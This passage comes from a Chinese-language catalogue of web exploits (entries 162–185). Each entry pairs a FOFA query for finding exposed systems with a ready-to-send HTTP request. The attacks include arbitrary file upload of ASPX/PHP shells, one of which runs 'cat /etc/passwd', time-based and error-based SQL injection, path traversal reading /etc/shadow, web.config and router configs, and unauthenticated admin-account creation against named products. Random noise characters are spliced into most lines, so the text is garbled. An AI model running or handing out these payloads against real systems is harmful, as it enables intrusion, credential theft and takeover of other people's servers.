<fileName>../../../../dizxdell.aspx</fileName>; q' K; U; p* k" {
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>4 P" t2 E- M% W% S- D' A0 d
<tag>3</tag>
; v0 k5 K( J$ m7 }$ g9 I- ~</UploadResume>
9 O% \0 `+ G5 z# Z1 v' R</soap:Body>. Z8 {3 A7 \/ a
</soap:Envelope>' j' R4 R' K" Q: p7 C
# b- V9 J, i" I- T, N
& d/ h7 I8 \: r* A! ~. Q* ghttp://x.x.x.x/dizxdell.aspx7 y' q% E: _) y( H
8 R5 I$ `3 I+ ?, u* b
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传% N7 C, w. b3 |; v4 M
FOFA: app="和丰山海-数字标牌"
" I+ c$ a3 b& P, z( |POST /QH.aspx HTTP/1.1
2 ] @( S' z: GHost: x.x.x.x0 o7 P, x6 q! x. j5 Q/ W% [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
9 a! s: [/ y5 t: g9 W( fConnection: close& i5 a5 e* U. x/ Y5 k. R
Content-Length: 583
& ], V) |6 h" x2 o$ d$ m) f8 [- BContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey/ U5 \4 p" E9 @3 N
Accept-Encoding: gzip
* v4 r( D+ C+ E8 d) _+ T% V* C2 ~: ]5 J' F# {/ c- l' h% P
------WebKitFormBoundaryeegvclmyurlotuey. T3 L" i" F4 p/ h/ q
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"6 Y% i; d7 Y* f+ {. w
Content-Type: application/octet-stream
" E% e& Y. U% t$ w- l7 v+ m
H3 {5 U7 T5 d<% response.write("ujidwqfuuqjalgkvrpqy") %>
2 {8 s- W U" p$ s: U7 D------WebKitFormBoundaryeegvclmyurlotuey
: r% @1 R5 z v. z. cContent-Disposition: form-data; name="action"
! m. X- C' N4 [; I$ K, \
6 D T$ i. a; O! i) g5 Eupload
* m; T+ U: ]. S# P$ Y------WebKitFormBoundaryeegvclmyurlotuey) f% |% K: M+ ], ?' m- U% Z
Content-Disposition: form-data; name="responderId"
3 s7 |" j, \ q+ I5 I6 F/ P1 d* m% U# M7 Z& X* l
ResourceNewResponder
4 K8 q3 s, K% G' o( U------WebKitFormBoundaryeegvclmyurlotuey* a) |3 @0 ~# K: V& M ^* V' Y H
Content-Disposition: form-data; name="remotePath") U5 k. a& ~; @0 w! p
9 P/ D7 z4 d8 ?: Q/opt/resources
q7 Z3 Y. B8 l! H6 e------WebKitFormBoundaryeegvclmyurlotuey--3 d1 @$ R% j& @/ G: j
3 q) l$ L. I8 v+ {5 x3 f
; W' b, g3 L7 e# L: e$ ^
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
6 [, N, S; _; E/ L& X0 P7 z. ~
( R6 J3 | {0 o+ u# e9 @163. 号卡极团分销管理系统 ue_serve.php 任意文件上传: |* Y& |2 C Q
FOFA: icon_hash="-795291075"
" X" \+ n9 j8 w+ [- x* bPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.19 R' z& A4 c: `1 W
Host: x.x.x.x/ Y* ]/ E- p9 ]' O S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.364 d9 A k* l$ P
Connection: close
3 b4 b# M4 o; o% |8 FContent-Length: 293
# i* b# r& w+ d( L/ Y3 DAccept: */*9 D6 {9 `/ V- o
Accept-Encoding: gzip, deflate
! n/ h: Z. ?5 R+ m" r: B V7 rAccept-Language: zh-CN,zh;q=0.9
q% A5 Y9 p* M: W# Y1 _/ uContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod* X# @$ R! q' k6 U) M) Y1 X: Q
" Z% }# ]: F0 @0 ~1 a! R: @------iiqvnofupvhdyrcoqyuujyetjvqgocod
3 O$ a7 o& D" [4 L) s; ]0 J* `Content-Disposition: form-data; name="name"
7 V4 I/ O& n, s6 q0 @% b3 T! T% d9 y! Z& C7 p# ]
1.php
! r: r' j( e; F' }: c' Y! l& j------iiqvnofupvhdyrcoqyuujyetjvqgocod6 o d0 V7 A/ X6 s) e: |2 m
Content-Disposition: form-data; name="upfile"; filename="1.php" v2 @$ |! d1 g4 S$ Z% q" }
Content-Type: image/jpeg+ c4 ?- p H$ \6 h
, N! K6 ?5 l( i( c
rvjhvbhwwuooyiioxega
1 t- g# U* w/ I% l------iiqvnofupvhdyrcoqyuujyetjvqgocod--! c/ X# J# M4 H* Z
$ g" i$ B( V, ~/ |
" Z/ K6 J* c `' G1 N164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传/ T3 u5 j) y7 y( i0 V( U
FOFA: title="智慧综合管理平台登入", I6 H6 A- q' h* z( K
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1. P) a( V- O0 m+ }3 B
Host: x.x.x.x T* P! B4 _6 Y4 r' E- ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
/ Q: R0 k2 y" S5 ?% I6 eContent-Length: 288* z3 s: M7 {* J+ k
Accept: application/json, text/javascript, */*; q=0.01
; Y6 X ~" D( Y QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,# C3 O2 s5 u7 @- A8 _% ^2 {; B
Connection: close
- S4 w/ d3 b DContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl3 F5 ~* G0 h* m* G5 \3 O! Y
X-Requested-With: XMLHttpRequest Q) F' A* v7 g; i, L, V) [# \% Z
Accept-Encoding: gzip5 L) H! o' h+ [2 ?: F% v
/ N4 f$ Q* B8 h
------dqdaieopnozbkapjacdbdthlvtlyl3 Z) Z9 R% ?/ _# d g/ F5 _" p3 b
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx". U# P4 b7 @$ |
Content-Type: image/jpeg
+ v3 Y4 F8 ^ a+ m* _0 M/ q/ w; r1 |' c
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>: Y. m& w. A1 K# J4 N
------dqdaieopnozbkapjacdbdthlvtlyl--& Y. F( _0 t- A' }! f
: o6 s; A% ^! P4 z7 l* R/ y6 O" c8 L, D, ~
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
; O' N3 n2 ?; _; N+ i+ S
' ~$ M3 L# F0 b2 {165. OrangeHRM 3.3.3 SQL 注入
% ^- T+ `6 v3 d( s& p' UCVE-2024-36428
* F* w) K5 S+ n8 s; T0 G4 gFOFA: app="OrangeHRM-产品"- j B, f$ Q& m4 C9 o
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
% x8 {8 h. R9 |, b( b9 \# K) g4 {1 R' U
( }) E. i' A; j2 p
166. 中成科信票务管理平台SeatMapHandler SQL注入
4 ?# L, _( J( M0 }) U- @FOFA:body="技术支持:北京中成科信科技发展有限公司"
/ F9 w' o% f1 n& Q' ]7 c! e0 I4 @POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
8 z( s5 ?: k: T( I/ IHost:
' K- c9 w" f6 a9 lPragma: no-cache( G9 V$ N+ @# s$ C: R, c+ \9 F6 G( x
Cache-Control: no-cache8 ~7 k& E5 S8 w: e; p
Upgrade-Insecure-Requests: 12 R1 X# e* w" |' p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.360 W/ ^5 j4 ^2 h. \" E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 q0 N* ^2 h! M- z+ q
Accept-Encoding: gzip, deflate! c+ }8 _% u: o1 p2 e
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8; G- X* K8 ?( k' k* G! [8 w4 s( I
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE5 s& v" G4 J- ?) ^
Connection: close- C5 e1 }7 v" ?) [$ s/ Q$ {
Content-Type: application/x-www-form-urlencoded( o# G: r8 \5 _
Content-Length: 89; w4 ?" Q7 M$ Y$ s' T, [' [( n
9 i* h9 y5 J# j- V4 E2 T9 pMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
- o7 W6 W% @+ {4 t. c4 @+ ]
* e2 `" Z+ r4 }$ c
/ k" f/ g. o. D s8 `167. 精益价值管理系统 DownLoad.aspx任意文件读取
" ]3 Y [/ R; S1 ^8 Z0 e( P7 v8 ~FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
4 f A" ~; F$ F) z K+ T# {GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1. h" D0 q+ F; ^
Host:
$ t, R4 U9 J0 @7 u1 f: _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# p5 `7 J- t* S7 q$ O7 t z2 @
Content-Type: application/x-www-form-urlencoded- n. B5 g0 w: h2 G4 o% V
Accept-Encoding: gzip, deflate( s& D; O- h# `; ]0 c
Accept: */*
9 b4 ]" D% x) O- vConnection: keep-alive) W- f7 x2 s" u4 ?& }' d9 D1 P
8 ~ e( _0 i: E+ \/ `/ G8 u- m' m3 w% l6 m4 r+ c
168. 宏景EHR OutputCode 任意文件读取8 I9 E3 y2 }0 P
FOFA:app="HJSOFT-HCM"8 m% D1 e; m) i) ^" j
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
# e) o1 {. T2 A7 Z& C4 kHost: your-ip
$ N6 C! `3 h0 B9 |' g/ W; XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36) b: X# N7 o A- Q6 J# j
Content-Type: application/x-www-form-urlencoded
' @/ ~) P- L; o% }1 A4 KConnection: close
% g( U4 y% y% O# d( {. v: r. k
$ G: }: k( Q" d N# f0 L& r* A/ m
+ y# v' t$ n9 s" z( a) e9 @. y3 k3 v/ U0 X. q
169. 宏景EHR downlawbase SQL注入( Z! R- g8 `; B8 `
FOFA:app="HJSOFT-HCM", w9 e5 I# d- V* U
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1, Y. V1 A. Z8 q+ ?* x; M W# J3 k
Host: your-ip- L7 }" H6 v! Y- W9 t1 q( Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 L5 q5 h) R! }, b) a$ Q9 vAccept: */*7 R+ `& F9 V7 e* a
Accept-Encoding: gzip, deflate
3 B+ A+ v- A x: x1 qConnection: close
; Z0 V9 p& D2 u$ i4 t: J1 q9 h3 p, I, T& F) b% q2 k; L# h! p2 M
+ z4 I7 x0 s# ?3 b) c" q
- ^! ?3 v3 N- @7 j( l7 P3 S/ x170. 宏景EHR DisplayExcelCustomReport 任意文件读取
2 q6 r& c/ c, j, y0 d4 D H; KFOFA:body="/general/sys/hjaxmanage.js"
" k1 d3 ]; {: [POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
$ [! D' o! v+ r/ PHost: balalanengliang* _' S8 X; t# |" ?& ~: l
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- i d0 H4 M7 [% E. F8 P2 b
Content-Type: application/x-www-form-urlencoded
+ j$ \5 T4 h8 ~$ f" V9 n
" U& W; C E; B8 Z7 S0 U. Jfilename=../webapps/ROOT/WEB-INF/web.xml) d7 @# t$ I. D, }- z0 }
, N/ c8 [: ~1 ?) K! W' H8 t
* i' n) k: }0 y. ^0 N9 x171. 通天星CMSV6车载定位监控平台 SQL注入9 Q) a( Q" v' {8 V
FOFA:body="/808gps/"
4 u% ~ y3 _0 k* ?7 a4 PGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1: Z6 E' _" l" M/ \8 C$ R+ |
Host: your-ip" l3 B+ B) w/ Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
; i2 F2 ]3 g; ^0 EAccept: */*
' M$ t8 ]7 X c- q. H& [9 lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! o: ^& ~( P7 e2 L9 `
Accept-Encoding: gzip, deflate
. I9 \' _; ~- r# i+ q( R! gConnection: close2 ?% {& m# l* `! N0 X, j; E- l* M( \& O z
% w: [, P& n1 e! d0 X% j7 Q( |# x+ v" ]' o
, ]3 M- G4 @) ~8 A8 J) G: w: d$ u
172. DT-高清车牌识别摄像机任意文件读取
" j( ? Z+ `' L3 {# y5 }FOFA:app="DT-高清车牌识别摄像机"
; \+ m8 p, @ X4 P/ aGET /../../../../etc/passwd HTTP/1.11 C0 v; \: l1 x( ^
Host: your-ip
5 L' J. C# @6 n7 iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; |' ~- J3 e) F, s) O
Accept-Encoding: gzip, deflate% Q4 O) R6 o* r4 [
Accept: */*, y. W/ \0 d6 t* k; i# c
Connection: keep-alive/ o- v! ? q- R) C
7 Z7 q. b, e7 @# M S; n$ Z: r v9 _1 U! f* r
* C- K- g; k; e! U# Y: z9 [1 p173. Check Point 安全网关任意文件读取
6 ~% I5 Y9 }# j5 J- ACVE-2024-24919% u$ ]) |4 ^- H. Y+ g8 f5 v. @$ e
FOFA:app="Check_Point-SSL-Network-Extender" ]' f8 u. m. m* r% W) ~
POST /clients/MyCRL HTTP/1.1* f# S. G+ ^: |9 u. b2 L! o
Host: your-ip; m! B% U6 g% t6 E- i8 w/ _' z, r. ]
Content-Type: application/x-www-form-urlencoded
$ ^7 e, [# {+ g6 x' [8 @8 j' O% i( L, w' f, U4 A# P/ E
aCSHELL/../../../../../../../etc/shadow: {* g3 U5 J' u8 D: w" I6 f, M
( K. e# h- n7 _! ~& E6 d [! } F! s6 E9 f; K
! ]. o0 h& b2 q: [7 j: |8 Q4 I174. 金和OA C6 FileDownLoad.aspx 任意文件读取
# ~) D* O6 b, C- oFOFA:app="金和网络-金和OA"
4 C- |- H0 ^# O: z) h/ T5 sGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.10 i& ], H3 ?# J
Host: your-ip; I/ X1 s( G& f6 k' l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
s$ Y* ?0 f' p/ g8 g* j) BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ n0 C8 d& k% W/ \6 NAccept-Encoding: gzip, deflate, br
: S j. X$ b& a- b6 ^0 rAccept-Language: zh-CN,zh;q=0.9
( f; Z3 v2 i) \. oConnection: close
& `) G4 b2 a, E; e" E8 G$ P' e5 U. n0 W: B
( K) l9 [: ]* ~7 N! t$ b- j. Y
; i7 h/ r; k) Q; V# F175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
( D5 h/ q0 o4 K5 d9 H0 WFOFA:app="金和网络-金和OA"
4 n9 {$ w. {) [3 z9 GGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
" e' J% K1 A2 h* |/ M9 qHost:
* _, K6 L4 c* A. aUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
; J4 }- Q7 A# x) m- T& z* ~* A& qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 W3 K/ s; Q3 z/ W3 ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 m3 ], _( B6 y- _Accept-Encoding: gzip, deflate
- l6 @5 h; d T" p# r& R- {Connection: close6 I- p3 G9 U4 v& D) C: q
Upgrade-Insecure-Requests: 1
' H8 R1 r) r. X9 Z! W9 E1 B+ Q) ^- K; w; r( d/ K
9 T V% H* |+ B% |5 f# `$ p
176. 电信网关配置管理系统 rewrite.php 文件上传/ I3 |& h$ G6 q. f
FOFA:body="img/login_bg3.png" && body="系统登录"/ j. s$ @, ], z: \5 f+ l# V
POST /manager/teletext/material/rewrite.php HTTP/1.1# e, C) s9 Q- {. M, h: L
Host: your-ip
2 | N( U. k, Z) y0 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
; e- {& E) k6 |3 H8 y) }7 o8 C: ~Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
" m2 ] L4 f0 D6 nConnection: close2 S! I+ |" `8 e! T
7 w8 Y2 n/ Q$ n; q6 s
------WebKitFormBoundaryOKldnDPT
+ ?# w' a9 Z( LContent-Disposition: form-data; name="tmp_name"; filename="test.php"- a5 U9 {1 D( v5 o
Content-Type: image/png2 |+ e$ {7 ]1 _8 s, e3 w6 b2 I
2 ]8 w* C$ G2 ?6 }<?php system("cat /etc/passwd");unlink(__FILE__);?>
" U( W4 o1 E9 [$ Y------WebKitFormBoundaryOKldnDPT! P8 P+ F& r8 X9 v5 M1 |
Content-Disposition: form-data; name="uploadtime"
# X) @5 v q6 }4 c4 H# \" h( D" D7 d
3 O% p* x. }. _1 p, H" j
- F; c8 y0 k! d8 }2 s0 g------WebKitFormBoundaryOKldnDPT--; M( `6 x$ A- K0 B
5 F4 ]! b. M8 T! o5 D) a8 {$ @
7 G8 n% r+ c; I2 g* A
! u: l7 }# N( w* j6 ^177. H3C路由器敏感信息泄露1 ^ n2 ~( f3 E' S
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
5 N, u+ e5 N: y' b2 N v! K2 ]" d/userLogin.asp/../actionpolicy_status/../M60.cfg
# w. y9 T$ J1 b% e/userLogin.asp/../actionpolicy_status/../GR8300.cfg
: F+ T' b7 c, ^% K/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/ ^) K8 @/ ?! W, p/userLogin.asp/../actionpolicy_status/../GR3200.cfg
5 A3 |% d% Z# {# x/userLogin.asp/../actionpolicy_status/../GR2200.cfg
$ a$ B, [ ^+ k1 U1 N F3 a/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg; N% B) w) m4 V* a
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
3 \) ` x' s/ c$ }$ W' l/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg6 [9 [. S/ m; l
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
. Y: F4 ^ _6 d5 H9 F! l/userLogin.asp/../actionpolicy_status/../ER5200.cfg
3 F u' M# `. }9 b/userLogin.asp/../actionpolicy_status/../ER5100.cfg E4 o3 o$ N" E; |! v
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg1 I" l. T _7 I! T7 \
/userLogin.asp/../actionpolicy_status/../ER3260.cfg* E+ E, P. t! ]" b; a8 U8 v9 b
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
- x7 z6 }! d* r# t0 b/userLogin.asp/../actionpolicy_status/../ER3200.cfg
4 z2 l/ A6 e% }/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
1 r& p% j! n/ ~, \' D/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
: E0 y2 }* Q* }! R/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg2 O6 _6 ?9 D! V
/userLogin.asp/../actionpolicy_status/../ER3100.cfg' ?" \' O0 y/ ^+ Q! @
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg! Z# e8 z/ J& }
9 L! b+ d5 E9 e! k- S7 m9 r- c8 I; [( P3 B( z
178. H3C校园网自助服务系统-flexfileupload-任意文件上传* B& ^9 C* M- u+ c( @8 @* Z
FOFA:header="/selfservice"% M; h; E, r) J" I4 y
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
e+ s+ x. T* o! F* gHost:
8 U- x- N, v2 A# k+ ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
' j$ ?, A0 J6 I0 z- e' L' IContent-Length: 252
1 g2 H8 W" C/ o' sAccept-Encoding: gzip, deflate
8 h/ i" Z# Z$ j! t; O8 {+ d- ]Connection: close
2 J2 H/ U- I. t% L {2 c0 b3 p, nContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l4 y: C% w8 U# T& c' C0 u3 j# y
-----------------aqutkea7vvanpqy3rh2l
% K; U& b5 r$ UContent-Disposition: form-data; name="12234.txt"; filename="12234"
/ N# Z5 c# g4 z# W+ D" `Content-Type: application/octet-stream/ G! o2 G" O7 g% T
Content-Length: 255
3 |5 X( w! W% U; ~' C8 x/ R3 a( q- j: I; V2 j
12234
- h: k1 p! a( l-----------------aqutkea7vvanpqy3rh2l--
8 f( {; U, f3 f2 Y9 E. V+ O. Q6 v* I! \0 ?$ s
6 E- J. l( L0 w+ I q
GET /imc/primepush/%2e%2e/flex/12234.txt
' |9 e+ ~# A. B9 Z- o5 [/ v& @2 z: m- R5 G" i
: \0 L/ X, N+ N: Y3 o179. 建文工程管理系统存在任意文件读取7 f0 M4 S7 \" a2 |8 q! W
POST /Common/DownLoad2.aspx HTTP/1.11 o9 I9 i- F& E. `1 N8 L$ M
Host: {{Hostname}}
' b: f) U5 V! C8 y" }2 c3 \Content-Type: application/x-www-form-urlencoded
# ]' h7 U1 B9 O M- O# A% s- X8 _User-Agent: Mozilla/5.0
; E. n) J& p4 t( }, u) o5 I% J- \: P, N
path=../log4net.config&Name=
# M5 k( ^ I* b' c' U8 N
# z" t/ h! D F; L
9 _# e D5 I$ }$ E& j0 G- B180. 帮管客 CRM jiliyu SQL注入4 o) R) X7 \( i; c) x/ q. @5 Y% z, b4 W
FOFA:app="帮管客-CRM"
7 k9 \, L) q- ~GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
" @% Y; r" J. eHost: your-ip
2 R# K6 G% ?- r5 C l( V; dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.360 g+ ]6 i$ _* j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' u5 g' Y+ V( \3 F7 t* x/ BAccept-Encoding: gzip, deflate% O4 H9 v4 l' R9 k4 S. V1 v
Accept-Language: zh-CN,zh;q=0.9) Y' I( W P9 G
Connection: close
9 L6 B7 o; a( I1 b$ k! I7 S2 S
1 T3 W I4 d. _, H+ {5 x9 e; f1 |7 w4 c& E
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入7 t. d! B% X! ^) f+ k
FOFA:"PDCA/js/_publicCom.js"
/ X# E4 M) ~8 C; A J! u- Y! fPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
4 t7 C n, I0 K9 T" r7 NHost: your-ip
: N. y5 ]9 ]/ p+ v% }. d# ]7 g. ~, dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
; c/ X4 ]# e6 X1 r" X+ j( B( GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; S" J: O, _" uAccept-Encoding: gzip, deflate, br
7 W# E2 T/ X- m6 g, R# zAccept-Language: zh-CN,zh;q=0.9/ z5 A1 o" w% R- R# b# p% E* o
Connection: close7 v& f2 W' X! {" O( h9 [" Y8 `1 A7 _
Content-Type: application/x-www-form-urlencoded6 p' p! L8 a2 k3 I
! h# C# U) p4 F/ T; {% j
! |" z) N& E9 ^% B3 Jaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20$ l5 q+ G# K* E2 |, X: m w
0 L, a, P1 N3 M0 C4 G, V" u v/ I$ p! b2 u8 t' G
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建2 k" q% L- L, ~
FOFA:"PDCA/js/_publicCom.js"2 r' k! [. v0 p- q% ]5 x# U/ n
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
' q- _8 w- J. Y9 IHost: your-ip( O5 {1 q) k, L# |/ D: ?+ b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.363 q. D! Y/ v$ ^2 H% `. B# n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ Z& _; } _. h2 N+ x4 L
Accept-Encoding: gzip, deflate, br! L) A& N* R5 W; G; _/ K: c
Accept-Language: zh-CN,zh;q=0.9' f5 }! ?7 t* o& B1 o" k
Connection: close
7 b. x7 V1 c( f( ?4 TContent-Type: application/x-www-form-urlencoded- T9 H# M1 i% ^) Y# {% R9 p9 E
: J+ Z$ x0 h6 z! J0 g. R; @8 @9 q- n; h
1 \: _ N7 {6 J h6 Ausername=test1234&pwd=test1234&savedays=1
9 s z. W1 i' m; @# N+ `8 t; r- {! \9 o# W5 u; r
v% n J' s+ v3 x/ A
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
% P5 ^! M, b' G* wFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面") h) R. y& c& Y" N% G- v
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.12 W |! h: p }9 ]7 e
Host: your-ip& Q0 ]7 N0 n# ~/ H7 G7 u6 D5 L" ~
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
' ~$ Z4 J5 w) K0 S! k1 PAccept-Charset: utf-88 W5 [! J7 F7 j3 u
Accept-Encoding: gzip, deflate
; e4 x" y# j2 aConnection: close
. w; u0 O! j- c- P$ w( ?/ ~6 r( w6 ~% n9 @7 }# o' _. k4 y
: A# V4 ?! |# F% U4 w1 P0 T% [( m% m
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加4 R% o, d. ^9 G0 D6 f) R
FOFA:server="SunFull-Webs"
+ E5 I. I7 D1 O* y/ R" wPOST /soap/AddUser HTTP/1.1
, @; |% U# }+ a3 ^4 F# Q! W5 o. |Host: your-ip
3 V/ ^8 G( D; o6 @Accept-Encoding: gzip, deflate
- e. ^0 k1 @) h+ d( g! {/ OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
k7 e$ V7 M5 f* y! I' kAccept: application/xml, text/xml, */*; q=0.01
8 Q2 C$ Y5 E9 XContent-Type: text/xml; charset=utf-8
9 l. I" x' Q/ ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" I) s; r3 J A2 C5 zX-Requested-With: XMLHttpRequest( O. s8 K6 R" ]' a! X9 v4 D" ?. y" Q2 ?
1 e: e! f0 n4 Q- d( ?( I0 Z2 }' z4 ?
: g! r" ]/ ~2 R' f Qinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56'), t0 M4 q4 ]/ T" t! ]5 f( x. K9 b
! {9 A3 L5 J5 z2 p5 w% Z4 s
2 c7 q# t$ ]- m185. 瑞友天翼应用虚拟化系统SQL注入
8 i/ F: M+ d U- ^* N- jversion < 7.0.5.1
- [% k3 m! J* D7 M! _, w4 u9 F! PFOFA:app="REALOR-天翼应用虚拟化系统"
